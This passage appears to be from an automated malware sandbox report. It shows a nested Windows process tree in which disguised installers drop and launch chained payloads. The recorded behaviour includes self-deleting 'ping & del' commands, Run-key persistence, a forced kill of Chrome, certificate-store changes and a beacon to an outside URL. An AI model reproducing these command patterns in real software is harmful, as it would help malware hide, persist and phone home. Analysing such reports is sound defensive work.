                                                                                                                          PID:7716
                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kphyfqov.4np\app.exe /8-2222 & exit
                                                                                                                        15⤵
                                                                                                                          PID:8076
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\kphyfqov.4np\app.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\kphyfqov.4np\app.exe /8-2222
                                                                                                                            16⤵
                                                                                                                              PID:7836
                                                                                                                  • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\lylal220.exe
                                                                                                                    "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\lylal220.exe"
                                                                                                                    11⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:4284
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-JQ9M6.tmp\lylal220.tmp
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-JQ9M6.tmp\lylal220.tmp" /SL5="$105EE,298214,214528,C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\lylal220.exe"
                                                                                                                      12⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Loads dropped DLL
                                                                                                                      PID:5356
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-DS5D2.tmp\ysAGEL.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-DS5D2.tmp\ysAGEL.exe" /S /UID=lylal220
                                                                                                                        13⤵
                                                                                                                        • Drops file in Drivers directory
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Adds Run key to start application
                                                                                                                        • Drops file in Program Files directory
                                                                                                                        PID:6376
                                                                                                                        • C:\Program Files\Windows Defender Advanced Threat Protection\NUAURQBPZN\irecord.exe
                                                                                                                          "C:\Program Files\Windows Defender Advanced Threat Protection\NUAURQBPZN\irecord.exe" /VERYSILENT
                                                                                                                          14⤵
                                                                                                                            PID:5708
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-5TLF6.tmp\irecord.tmp
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-5TLF6.tmp\irecord.tmp" /SL5="$4046A,5922518,66560,C:\Program Files\Windows Defender Advanced Threat Protection\NUAURQBPZN\irecord.exe" /VERYSILENT
                                                                                                                              15⤵
                                                                                                                              • Drops file in Program Files directory
                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                              PID:6716
                                                                                                                              • C:\Program Files (x86)\i-record\i-record.exe
                                                                                                                                "C:\Program Files (x86)\i-record\i-record.exe" -silent -desktopShortcut -programMenu
                                                                                                                                16⤵
                                                                                                                                • Loads dropped DLL
                                                                                                                                PID:5808
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\09-0f08d-2fa-27a87-f4b9c8be29787\Jiraebuzhacu.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\09-0f08d-2fa-27a87-f4b9c8be29787\Jiraebuzhacu.exe"
                                                                                                                            14⤵
                                                                                                                              PID:7100
                                                                                                                              • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                                                                                                                                dw20.exe -x -s 2216
                                                                                                                                15⤵
                                                                                                                                  PID:7940
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\b0-fee4b-827-df7bd-56ad72aaebb43\Surexodico.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\b0-fee4b-827-df7bd-56ad72aaebb43\Surexodico.exe"
                                                                                                                                14⤵
                                                                                                                                  PID:5592
                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\q4bvltfg.cfk\gaooo.exe & exit
                                                                                                                                    15⤵
                                                                                                                                      PID:4616
                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xnecetgu.wdb\jgjg_note8876.exe & exit
                                                                                                                                      15⤵
                                                                                                                                        PID:4616
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\xnecetgu.wdb\jgjg_note8876.exe
                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\xnecetgu.wdb\jgjg_note8876.exe
                                                                                                                                          16⤵
                                                                                                                                            PID:4660
                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tw425g13.xb1\google-game.exe & exit
                                                                                                                                          15⤵
                                                                                                                                            PID:4600
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\tw425g13.xb1\google-game.exe
                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\tw425g13.xb1\google-game.exe
                                                                                                                                              16⤵
                                                                                                                                                PID:7396
                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                  "C:\Windows\System32\rundll32.exe" "C:\Program Files\patch.dll",patch
                                                                                                                                                  17⤵
                                                                                                                                                    PID:5316
                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\eelez5bh.3n3\askinstall31.exe & exit
                                                                                                                                                15⤵
                                                                                                                                                  PID:5256
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\eelez5bh.3n3\askinstall31.exe
                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\eelez5bh.3n3\askinstall31.exe
                                                                                                                                                    16⤵
                                                                                                                                                      PID:7700
                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rvrvdido.1x3\toolspab1.exe & exit
                                                                                                                                                    15⤵
                                                                                                                                                      PID:7656
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\rvrvdido.1x3\toolspab1.exe
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\rvrvdido.1x3\toolspab1.exe
                                                                                                                                                        16⤵
                                                                                                                                                          PID:8152
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\rvrvdido.1x3\toolspab1.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\rvrvdido.1x3\toolspab1.exe
                                                                                                                                                            17⤵
                                                                                                                                                              PID:7412
                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ft4jwgrc.ze3\setup_10.2_mix.exe & exit
                                                                                                                                                          15⤵
                                                                                                                                                            PID:7740
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\ft4jwgrc.ze3\setup_10.2_mix.exe
                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\ft4jwgrc.ze3\setup_10.2_mix.exe
                                                                                                                                                              16⤵
                                                                                                                                                                PID:7936
                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\z2mlesn4.czy\a1207b55.exe & exit
                                                                                                                                                              15⤵
                                                                                                                                                                PID:5420
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\z2mlesn4.czy\a1207b55.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\z2mlesn4.czy\a1207b55.exe
                                                                                                                                                                  16⤵
                                                                                                                                                                    PID:7344
                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\x5ldzbvi.cmb\app.exe /8-2222 & exit
                                                                                                                                                                  15⤵
                                                                                                                                                                    PID:4144
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\x5ldzbvi.cmb\app.exe
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\x5ldzbvi.cmb\app.exe /8-2222
                                                                                                                                                                      16⤵
                                                                                                                                                                        PID:7272
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\x5ldzbvi.cmb\app.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\x5ldzbvi.cmb\app.exe" /8-2222
                                                                                                                                                                          17⤵
                                                                                                                                                                            PID:6084
                                                                                                                                                              • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\JoSetp.exe
                                                                                                                                                                "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\JoSetp.exe"
                                                                                                                                                                11⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                PID:4800
                                                                                                                                                                • C:\ProgramData\8834824.exe
                                                                                                                                                                  "C:\ProgramData\8834824.exe"
                                                                                                                                                                  12⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                  PID:6748
                                                                                                                                                                • C:\ProgramData\4822962.exe
                                                                                                                                                                  "C:\ProgramData\4822962.exe"
                                                                                                                                                                  12⤵
                                                                                                                                                                    PID:6784
                                                                                                                                                                    • C:\ProgramData\Windows Host\Windows Host.exe
                                                                                                                                                                      "C:\ProgramData\Windows Host\Windows Host.exe"
                                                                                                                                                                      13⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      PID:6192
                                                                                                                                                                  • C:\ProgramData\8991988.exe
                                                                                                                                                                    "C:\ProgramData\8991988.exe"
                                                                                                                                                                    12⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                    PID:6912
                                                                                                                                                                    • C:\ProgramData\8991988.exe
                                                                                                                                                                      "{path}"
                                                                                                                                                                      13⤵
                                                                                                                                                                        PID:672
                                                                                                                                                                      • C:\ProgramData\8991988.exe
                                                                                                                                                                        "{path}"
                                                                                                                                                                        13⤵
                                                                                                                                                                          PID:4292
                                                                                                                                                                    • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\sskiper.exe
                                                                                                                                                                      "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\sskiper.exe"
                                                                                                                                                                      11⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      PID:5720
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\208718855.exe
                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\208718855.exe
                                                                                                                                                                        12⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                        PID:7008
                                                                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                          C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                          13⤵
                                                                                                                                                                            PID:6500
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1023938005.exe
                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\1023938005.exe
                                                                                                                                                                          12⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          PID:6680
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1023938005.exe
                                                                                                                                                                            "{path}"
                                                                                                                                                                            13⤵
                                                                                                                                                                              PID:6972
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            "C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\sskiper.exe & exit
                                                                                                                                                                            12⤵
                                                                                                                                                                              PID:5576
                                                                                                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                ping 0
                                                                                                                                                                                13⤵
                                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                                PID:7336
                                                                                                                                                                          • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\BarSetpFile.exe
                                                                                                                                                                            "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\BarSetpFile.exe"
                                                                                                                                                                            11⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            PID:4228
                                                                                                                                                                          • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Adsbrowser.exe
                                                                                                                                                                            "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Adsbrowser.exe"
                                                                                                                                                                            11⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                            PID:5376
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\zoxfpu5y3jj\ngv4ampi0sx.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\zoxfpu5y3jj\ngv4ampi0sx.exe"
                                                                                                                                                                      8⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      PID:4172
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\zoxfpu5y3jj\ngv4ampi0sx.exe"
                                                                                                                                                                        9⤵
                                                                                                                                                                          PID:5076
                                                                                                                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                            ping 1.1.1.1 -n 1 -w 3000
                                                                                                                                                                            10⤵
                                                                                                                                                                            • Runs ping.exe
                                                                                                                                                                            PID:5536
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\ksvfyb1px1e\KiffApp1.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\ksvfyb1px1e\KiffApp1.exe"
                                                                                                                                                                        8⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        PID:1732
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\xiqe3sok5uc\IBInstaller_97039.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\xiqe3sok5uc\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
                                                                                                                                                                        8⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        PID:4528
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-O39O1.tmp\IBInstaller_97039.tmp
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-O39O1.tmp\IBInstaller_97039.tmp" /SL5="$203CE,10078909,721408,C:\Users\Admin\AppData\Local\Temp\xiqe3sok5uc\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
                                                                                                                                                                          9⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                                                          PID:5288
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            "cmd.exe" /c start http://leatherclothesone.xyz/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039
                                                                                                                                                                            10⤵
                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                            PID:5444
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-NUSRK.tmp\{app}\vdi_compiler.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-NUSRK.tmp\{app}\vdi_compiler"
                                                                                                                                                                            10⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            PID:5472
                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-NUSRK.tmp\{app}\vdi_compiler.exe"
                                                                                                                                                                              11⤵
                                                                                                                                                                                PID:5752
                                                                                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                  ping localhost -n 4
                                                                                                                                                                                  12⤵
                                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                                  PID:6756
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\5cymbd0un3s\app.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\5cymbd0un3s\app.exe" /8-23
                                                                                                                                                                          8⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          PID:5184
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\5cymbd0un3s\app.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\5cymbd0un3s\app.exe" /8-23
                                                                                                                                                                            9⤵
                                                                                                                                                                              PID:4696
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\mh53uotdmf5\vpn.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\mh53uotdmf5\vpn.exe" /silent /subid=482
                                                                                                                                                                            8⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            PID:5308
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-FQ9CL.tmp\vpn.tmp
                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-FQ9CL.tmp\vpn.tmp" /SL5="$10504,15170975,270336,C:\Users\Admin\AppData\Local\Temp\mh53uotdmf5\vpn.exe" /silent /subid=482
                                                                                                                                                                              9⤵
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                                                              • Modifies system certificate store
                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                                                                              PID:5368
                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                                                                                                                                                10⤵
                                                                                                                                                                                  PID:4236
                                                                                                                                                                                  • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                                                                                    tapinstall.exe remove tap0901
                                                                                                                                                                                    11⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                                                    PID:5740
                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                                                                                                                                                                  10⤵
                                                                                                                                                                                    PID:6764
                                                                                                                                                                                    • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                                                                                      tapinstall.exe install OemVista.inf tap0901
                                                                                                                                                                                      11⤵
                                                                                                                                                                                        PID:7068
                                                                                                                                                                                    • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                      "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                                                                                                                                                                      10⤵
                                                                                                                                                                                        PID:7596
                                                                                                                                                                                      • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                                                                                                                                                                        10⤵
                                                                                                                                                                                          PID:7840
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\qzzx40dmcrp\yslhu25ixfl.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\qzzx40dmcrp\yslhu25ixfl.exe" /quiet SILENT=1 AF=756
                                                                                                                                                                                      8⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                      • Enumerates connected drives
                                                                                                                                                                                      • Modifies system certificate store
                                                                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                      PID:5552
                                                                                                                                                                                      • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\qzzx40dmcrp\yslhu25ixfl.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\qzzx40dmcrp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1617983790 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"
                                                                                                                                                                                        9⤵
                                                                                                                                                                                          PID:6028
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\TKKT4HX1PP\setups.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\TKKT4HX1PP\setups.exe" ll
                                                                                                                                                                                  5⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                                                  PID:3556
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-LT7P1.tmp\setups.tmp
                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-LT7P1.tmp\setups.tmp" /SL5="$1002CA,726852,244736,C:\Users\Admin\AppData\Local\Temp\TKKT4HX1PP\setups.exe" ll
                                                                                                                                                                                    6⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    • Checks computer location settings
                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                    PID:1492
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Version.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Version.exe"
                                                                                                                                                                                4⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                                                                PID:1488
                                                                                                                                                                                • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                                  "C:\Windows\System32\WScript.exe" "C:\Program Files\unins0000.vbs"
                                                                                                                                                                                  5⤵
                                                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                                                  PID:3612
                                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
                                                                                                                                                                                    6⤵
                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                    PID:2080
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"
                                                                                                                                                                                4⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                PID:3668
                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                                  5⤵
                                                                                                                                                                                    PID:4104
                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                      taskkill /f /im chrome.exe
                                                                                                                                                                                      6⤵
                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                      PID:4516
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
                                                                                                                                                                                  4⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  PID:4992
                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe" >> NUL
                                                                                                                                                                                    5⤵
                                                                                                                                                                                      PID:4460
                                                                                                                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                        ping 127.0.0.1
                                                                                                                                                                                        6⤵
                                                                                                                                                                                        • Runs ping.exe
                                                                                                                                                                                        PID:4236
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"
                                                                                                                                                                                    4⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                    PID:4540
                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                              1⤵
                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                              • Modifies Internet Explorer settings
                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                              PID:4612
                                                                                                                                                                            • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                              C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                              1⤵
                                                                                                                                                                              • Modifies Internet Explorer settings
                                                                                                                                                                              PID:4716
                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                              1⤵
                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                              PID:2256
                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                              1⤵
                                                                                                                                                                              • Modifies Internet Explorer settings
                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                              PID:1888
                                                                                                                                                                            • C:\Windows\system32\msiexec.exe
                                                                                                                                                                              C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                              1⤵
                                                                                                                                                                              • Enumerates connected drives
                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                              PID:4604
                                                                                                                                                                              • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                C:\Windows\syswow64\MsiExec.exe -Embedding 264A3C76DB64E6F69A3BFC8099960C2F C
                                                                                                                                                                                2⤵
                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                PID:5948
                                                                                                                                                                              • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                C:\Windows\syswow64\MsiExec.exe -Embedding 9767C5D90B87138ACDA11E66870A865C
                                                                                                                                                                                2⤵
                                                                                                                                                                                • Blocklisted process makes network request
                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                PID:6352
                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:5164
                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=756 -BF=default -uncf=default
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:6992
                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" "--anbfs"
                                                                                                                                                                                        4⤵
                                                                                                                                                                                          PID:5408
                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
